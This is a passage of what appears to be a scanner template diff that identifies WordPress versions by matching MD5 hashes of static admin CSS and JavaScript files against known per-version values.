+ dsl: + - "(\"44d281b0d84cc494e2b095a6d2202f4d\" == md5(body))" + - type: dsl + name: 3.7 + dsl: + - "(\"b0bcf8091516db358ee9c833afd73175\" == md5(body))" + - type: dsl + name: 3.6.1 + dsl: + - "(\"cf4bbd562430a9bcbe735062be851be1\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"42ce18e88f1c21d4e991fcd431bcb606\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"a58dd12608659503cf087e879e720354\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"55c80a4794624ce9b94aa3631ad46c0b\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"8e529a971610d7ebe7851339c5cb3d67\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"ff19e44be975f89b647274d85b70f821\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"0bdbc699dcd94bbf27740456e0c70ce2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7f8a7473d6a2a2d9816c6688dc4b0df8\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a82a5f154aa92773bc69f1eab87fbfd9\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"54783b9eb731afb52deaa7b9363ab737\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"b412f1a6785cc7ef118bf2a9f473b318\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"aaef9189b58df07114fca6a31585aab2\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"953c4f11c4e771f648c1fe2d51c597fb\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"c57da9f509c04902726f6d3597789c58\" == md5(body))" + - type: dsl + name: 4.9.2 + dsl: + - "(\"3c27a95feefe245fc5c8c46427521f09\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"b7af6b7e6c71dab43041eeb21108a8ab\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"a8c67704a82b41a42524d020b12b3b89\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.16 + dsl: + - "(\"f789924dd9fbbd262ca2cadfba966702\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ae0291326626c0f608f620ac31dd6c6e\" == md5(body))" + - 
type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ceb9ed0506ba955acda0e88cef60d26f\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"c191344939b4e7f2ddc2b75796d84e4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/wp-admin.css" + matchers: + - type: dsl + name: 2.9.1 - 2.9.2 + dsl: + - "(\"7f6e4c1e4b7b6d0f6c5a33e63c89b8df\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"f27247eed86da668df2bfda806b64f7c\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"27cd5586d26660072c71e77a2e530496\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"c8890b0c8e534a2a8770b32fd1bca900\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"3fbd461d75443496e1dd6f2b3c9bce0b\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"d8368e8363d075d21a3bb37239c01755\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"32170b63ff23d8bcfc703e7f36c6912b\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"b084bcb3f80a884a197778a347b74b62\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"091a03c35dc57f391703e37367453fec\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"6e14567f0e63c4538953578bb95ded3c\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"cd8134a147e7105f539b171536b6fc12\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e2f373fc95a33f5d995be0b7f930d394\" == md5(body))" + - type: dsl + name: 2.0.6 - 2.0.11 + dsl: + - "(\"76015d4b9339d6174aba14ca0283afbe\" == md5(body))" + - type: dsl + name: 2.0.5 + dsl: + - "(\"47479f0fd01b49b2012691cf5a11457e\" == md5(body))" + - type: dsl + name: 2.0.4 + dsl: + - "(\"cf3be0c31abbdd50a0826de6e3066f9a\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"030b95d77a6057ba4813e4a14766067e\" == md5(body))" + - type: dsl + name: 2.0 + dsl: + - "(\"d2d02d4b7b4ec10e3b3fecbf755f9a31\" == md5(body))" + - type: dsl + name: 1.5.1 - 1.5.2 + dsl: + - "(\"c6a1adba93cd3b259a0ae475ab92a028\" == md5(body))" 
+ - type: dsl + name: 1.5-strayhorn + dsl: + - "(\"c8930878ee2f74c02d9f1fa2e8def669\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"c4a70611c37e423cc22892fd58c48ef2\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b091ee8973313121b9e38552ef7809b0\" == md5(body))" + - type: dsl + name: 1.2-mingus + dsl: + - "(\"2c67006be8243807b644bdcc37cddb93\" == md5(body))" + - type: dsl + name: 1.2-delta + dsl: + - "(\"50206fb9d67a133304d59fd9d6ab3a4f\" == md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"8add712ec32385bae9ab167d993acca0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-controls.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"f163c1c2c4cdfd95b025798510673c75\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"0683a5bd4a316d854985a3549ec60418\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"71654e9542dd10aa8078f8c005d2cb7e\" == md5(body))" + - type: dsl + name: 4.7.4 + dsl: + - "(\"e48c8805a07665ba778e5d63c9fcd0a1\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"d8598fe25595153923bf25bfb57eb4d7\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"562e8a9067a62789ace0e21a1cb12efd\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"d89eff32867dbead906999d2d33df9dc\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"dcc637122733f05128df061051a6ab93\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"520e79c175d3cde31d6cf1a68ef40e35\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"985654bfee750d913031aeb32ad5d72e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"38dcd3fd1e6f4a9e4503eb6eae7ae92f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"78b299ef2b76ea0769e84138c6c2a6d4\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"6ded237d8837729ba31bb538833c0553\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.10 + dsl: 
+ - "(\"fba25769397927dace7ef2723e86c0a7\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - "(\"ee6e58fc6a055440e219557ad66b38aa\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"c48eef3773572618f27809300fae0cde\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.14 + dsl: + - "(\"7c0e981e54ea85d7971d0a9b25a9c263\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"979c54aa2966bbd7cb53e268fe75f3d8\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.17 + dsl: + - "(\"ab54b0e9583b36100738905f0d3a531d\" == md5(body))" + - type: dsl + name: 4.1.18 - 4.1.32 + dsl: + - "(\"955c9e88cf52cec1bf7fd7521405dc25\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"edc5f50d0fd73a32d5b06790ffcab513\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.17 + dsl: + - "(\"3362df7d178d660d2108e554428dc01f\" == md5(body))" + - type: dsl + name: 4.0.18 - 4.0.32 + dsl: + - "(\"7a47f3f40fb6d9785cbd14e7b3c37e21\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.18 + dsl: + - "(\"fe12ea464a3c4656f6a37b1627b96089\" == md5(body))" + - type: dsl + name: 3.9.19 - 3.9.33 + dsl: + - "(\"f7929c798aedde2e8aabb3a12a1e7303\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"119ce8b94732f6eb170f8215aa65d47e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"9f2f8d7a1cce39d9f72bbb3928707d23\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.35 + dsl: + - "(\"6c9e4bc36ce6c67a29e4bae09fba936b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.20 + dsl: + - "(\"ab62b63d49366e5face06aa3e1547904\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.35 + dsl: + - "(\"1880f5381359f05ad5c80f9aa2d60f59\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"80552729a4267ab8f23a521424da2d4b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0b77d6826fc7e62e2dba6145d0fc1ba1\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"c637cfded694d52045eb3235a7bf7303\" == md5(body))" + - type: dsl + name: 3.4.1 + dsl: + - 
"(\"aa0d38bd6f590ad8c3126074145b1bf1\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"b421960bde1ab1e1adfc822336103735\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"6b0f2e81ab83009e7d97de82e0fb679d\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"bf3aac7d4a9dce03ec9dd7e993fac22d\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"6ac6b067db2d518fac0045c7195cddd7\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"8dad23d14838a3e8600eff1bee809b2d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"2e1c867bb53db1bd8c61c325f62779d1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5faaf1990588ef0b12c268e7c0e2262f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9eb22f3a04a29d89c59ed6d84b39410e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"60fd86fb779d8562016277fa549883c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/common.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"311fefe1942d4341f5e75b322376750f\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"462a161d672f6a44beec251a7aa6c8d8\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"90444dc44a63c22d91d12278c033d4ea\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"30e4449aa544e1648d23ed7c2d1a5423\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"dbd27f153db56b47b84856cb1e41d7bb\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"0b5a51ad30a18d0328f17c2616da58a2\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"a572dd4154d97d362c76879e8e54dd58\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"6cff03191d6f406ced50cfa51737f4b6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"42612bfbee1791a7f347ef3b289f7b4e\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"fb3c19d5e908c23df77247918adbc413\" == 
md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"dc9e2fa5c5e058e9a9466f48322e0f32\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"c9ae6d908e595b6f14b7aa2ad86000d2\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"32fb4510695e27473897cb5251348395\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"2830c37f0e53cd900bce37ec46e29ddc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"72c3d94d42bb4c900a1436d17c156e67\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"60a507d4bbba0d8720af1741454c299a\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"1735dc0877bf1b36a76289168dd93b41\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"35767af35006b75866e3a5806ab6496f\" == md5(body))" + - type: dsl + name: 3.6.1 + dsl: + - "(\"03eaffeef39119f0523a49c7f9767f3b\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"2637ea6c99869af4bd6e4a49519601a7\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"af42e7400403ae6f09811b24724dc076\" == md5(body))" + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"6cedcf29a7ee4b373ed45b359210b149\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"18b6dcc3aec207acd021ff01f04f9e6c\" == md5(body))" + - type: dsl + name: 3.3.1 - 3.3.3 + dsl: + - "(\"6fa561d1ded6a9c6beec672642f12436\" == md5(body))" + - type: dsl + name: 3.3 + dsl: + - "(\"4516252d47a73630280869994d510180\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"57b1d1d19fdd9511131c71c51401af47\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"df619a8eb3ac90caded086e6415d9413\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2d55e645db78f330a6d5e9cefa039e62\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"ce3727017cbcf96de2cff9110b42ea94\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"2b623d55968742539ffde9ff9416bb29\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - 
"(\"4f0f9bdbe437f850430fae694ca046ba\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"3e3e8da7ed4e97776c76ca0c792d1a85\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"7265e623f77644f067b0f40de7a8262a\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"6c175816ac122145e3d941fd3607bacb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"450660797205ec498b60c20e63b31b6f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6925251401e3b9e69ef7950fdb34c6e9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4574fca70d9d122ca8a0505cc17a44e2\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"a189cdd52ffd54cca91d202615612872\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"72027ea41a37cbd5dc9909ed143fed50\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"eba4c4117c3cbc15a6f457b9c1716872\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-controls.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"8c9d0ff945cc23eb2c0d6ca6f0d344c6\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"32d18988e048936443961fa91f3ae990\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"8a0d38ad2a3ba06c2933629be5497559\" == md5(body))" + - type: dsl + name: 4.7.4 + dsl: + - "(\"c58c70935cb1028d58e6f3fd87c209b0\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"55c9454a7813e7bdf75fe74efa3f5916\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"0e9f7464783db8eec0a3629791448575\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"13ec0e9534db67402cd8e3de6e2ebaeb\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"949fc12a5224b4472f9db582f20f1a77\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"e5063f2033a90df6fcfb3e0c53644da8\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"25c0fd5be25b8e76aa416db9c7219a76\" == md5(body))" + - 
type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"14749abf568a231c66bc8d7b086a32ac\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"a3aa2d6d49a4e4b8ab1256c809722cce\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"4fd5dc4a5c6b1c33c27a0275e88d972f\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.10 + dsl: + - "(\"d802579942fc0bf5f30c8f487cc763ff\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - "(\"62a3187ffd7165378860d5b028e3d23a\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"eeffa28eb1d02c9852c4629192a2ad08\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.14 + dsl: + - "(\"fa9142f8d88f8566d3dd0b40b602ce2e\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"a61c630a083abd9666cf893fe6d047ca\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.17 + dsl: + - "(\"185bb6e6f980917f5b60c2364ed72891\" == md5(body))" + - type: dsl + name: 4.1.18 - 4.1.32 + dsl: + - "(\"eebd05514db4ad8b2f7c01614e40305c\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"0284b64cbc37e3ded9b11133d7bc5fa9\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.17 + dsl: + - "(\"2af7de921aa01a2401792027394b4b86\" == md5(body))" + - type: dsl + name: 4.0.18 - 4.0.32 + dsl: + - "(\"70e9460296f0015550202829a4875756\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.18 + dsl: + - "(\"66dcf489b86a9afa45d327f90f63e651\" == md5(body))" + - type: dsl + name: 3.9.19 - 3.9.33 + dsl: + - "(\"2b51b0bcb5aace306affe367f0e41984\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"d735782274ded5e119173b45cbe274f8\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"f520723d5ccdcb8e2a5c5d66f40d0e47\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.33 + dsl: + - "(\"bc89d78db3fba05de97e6a6453efb358\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.20 + dsl: + - "(\"fff5ffc0860ce7ad5f84f4c35034fe57\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.33 + dsl: + - "(\"4ade3891406d9308253a53aecd864f2e\" == md5(body))" + 
- type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"cf6adf41af1e679b9d888591256c9221\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"776140617bb3df0ecccdaf5a6d881fa3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"ce346a18d9b0d9ea703f53973ea09b06\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"0f62d3fad1802882f09617ec1c093f35\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"b865445e9cb37247e8067d3c321e4ad1\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"834739e5c30c856f39db861e3427285b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"2869deff881c09388d7ed6419df830ee\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4a48e911b20edfe9c2f9c52cd9ee6fe5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"80cfa16bc560acb9cbb3bea665ee501e\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"e7c0d56ef5d72a49f8d4439d31ff4669\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"cfb2d77a0067caf581ef810107666496\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e894f610b3f90d611f17eceba6f34eb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d401e7e4d7d0c47d14571dc98e47e171\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-views.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"baa261d498278715c636677425927576\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"9bbd1fa91e81ac80c6e1cd12783681a5\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"b44bc57736b0f9071a8d5b4e1a1c38c0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"6fad095c6f295131844afbfb089956d3\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"656fe22a4d1f6c149b387467c0ebda3d\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"973cb2c3a853f2291eed73febceba08c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + 
dsl: + - "(\"c2fbe6eff1344e4b42ac21bfeff6323c\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.19 + dsl: + - "(\"c0eda638d60a8c22407bac9866253eb0\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"999ad3a86de87c0c592571f5cee59fa9\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.20 + dsl: + - "(\"3a7456ca374af47b36df25b8db73a9b6\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"1cdc4006b43c0e6434817af8a031bcdb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8c94db3246f7e7de1c2b745fdae79383\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"45d6ae5dec12114dbd9b60fb03c4b510\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"a632e610f46df19fcefa26e4e6e0eab3\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"4fbc3282ad968a7874a32e69b2b5f7a8\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6a0e09e778c9d60192c03f0d862ad6ca\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f977730e90672fc7ba27ba83d4e190fd\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"8f9b3fcd0c47b1ba4bf54a1ed2989dd6\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"cd99128430a7e77777d1a80a3010f819\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"03c002070b42e7b16c032fb666774c66\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"d6c1665cce65f57593f33c6e94db1c32\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"608a9976d28d43953839ba010fe84e60\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"bd3abdf24209a6355e09603b811c866a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"8a3ff68fbf1fc580d0429d07ee55caf6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8806dd8e94b70370229f76b85c035efd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"24d3a9cd7cfb8c3b95e08bfe61feeed7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - 
"(\"4754c375277eba67871fb5ba44881fba\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"d461e034658d9fd174aa60691a242a1e\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"d27686a16f56b3a120483f46de693218\" == md5(body))" + - type: dsl + name: 4.3.21 - 4.3.25 + dsl: + - "(\"2ae7bb0173079ede4956aebecee60039\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"7eeec89992790dcd6095019d8befdb5d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0fd597b70db817207a401a77250cc1a9\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"98135834eef3a3a00ae7c6e99457110e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e1fe49b6b4e7308fd2eda9c49779c9d2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4863f6f7d44547fcfbe2fc609ef03637\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"34ad39cacba1f3dff07a862c378dc401\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-views.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ee966b410333d2346a3c39416a7fc3c4\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"72005ffa5742a50f41246d5917e6e295\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"b1414f1a1df9af09f7f4cf3b86e41967\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"e501be91f82cbda570582d00ce43c054\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7b6f5f8a908b5083766141dbb8f10751\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.23 + dsl: + - "(\"cfddc53d9255a751bfc5b0d3fd677c49\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"eea98800b824bcf0885b882020a92ae1\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.19 + dsl: + - "(\"6e56654cc6f63fbab2a38db06606b644\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"611a20dba38b0421dc1af45eeaac4acd\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.20 + dsl: + - 
"(\"7c56e29067eccb592238ea9e0650bed4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"8582d4a37ee89cbf90edc967c4af02b6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3c6df510503404b2ac5be6ddba836293\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"205636ab90b157901d261ffabf4480d6\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"bc83b1b178eb990c3eb122abe42f2674\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"3ad3ae90aca2f54e72b14fe7f0421ae9\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4ac9627f33575a6afaf4144704daecc2\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"0b13139d53176ef58565bdaa8b8190d4\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"b2517aad471230737b19eca7939536c6\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"d505be245b85486a9f2baffd711ae655\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"f744caaf733436017d261ed10764b05c\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"38ff988c7537bbaaefdc12d1f55f26f7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"f088ac384e6c8faec370911468e89703\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"45c3a5624225a7c168e9e697c546ef56\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"81d53dec5df1b4d291cacaff561a54c9\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"80b33095e5ba53fee0a8f993e1bffaf9\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7db21b9f1e3f67da3217e7e8168283a0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"bd2dfc60cbf1637c94e4c0fc5883e104\" == md5(body))" + - type: dsl + name: 5.2 